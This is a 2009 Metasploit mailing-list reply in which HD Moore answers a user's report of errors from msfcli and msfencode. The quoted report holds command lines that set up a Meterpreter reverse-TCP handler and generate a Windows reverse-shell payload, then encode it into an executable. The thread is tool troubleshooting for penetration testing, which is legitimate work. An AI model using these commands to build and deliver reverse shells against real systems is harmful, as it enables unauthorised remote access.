Re: possible bug in MSFCLI and msfencode?

[HD Moore <hdm () metasploit com>]

On Fri, 2009-12-11 at 08:15 +0100, Thomas Werth wrote:
> Dear List,
>
> i've installed latest svn of MSF on Backtrack 4 Beta.
> Just tried to use msfcli and got following error:
>
> root@vpcbt:/pentest/exploits/framework3# ./msfcli exploit/multi/handler
> PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=7777
> ENCODING= E
> [*] Please wait while we load the module tree...
> ./lib/msf/core/data_store.rb:93:in `each': The argument could not be
> parsed correctly. (Rex::ArgumentParseError)
>         from ./lib/msf/core/data_store.rb:93:in `import_options_from_s'
>         from ./msfcli:140
>
>
> did i miss something? I could bet this one had run on former version of
> msf fine...


Yes, you didn't specify an argument to the ENCODING option (which
doesn't exist anyways). This triggers an exception in the parser.

> Furthermore i get some error uses msfencode to encode a payload created
> with msfpayload:
>
> #creating Payload
> root@vpcbt:/pentest/exploits/framework3# ./msfpayload
> windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=7777 R > ./test.payload
>
> #start encoding
> root@vpcbt:/pentest/exploits/framework3# ./msfencode -e
> x86/avoid_utf8_tolower -i ./test.payload -o ./test.encoded -t exe -c 4
> (eval):146:in `decoder_stub': The payload being encoded is of an
> incompatible size (79 bytes)   from ./lib/msf/core/encoder.rb:270:in
> `do_encode'
>         from ./lib/msf/core/encoder.rb:254:in `encode'
>         from ./msfencode:188
>         from ./msfencode:185:in `upto'
>         from ./msfencode:185
>         from ./msfencode:175:in `each'
>         from ./msfencode:175
>
>
> Did i something wrong or is here a bug?

The avoid_utf8_tolower encoder is one of a special case that requires
additional input - its not possible to use this (or the unicode encoder)
from msfencode without specific options/inputs.

-HD

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework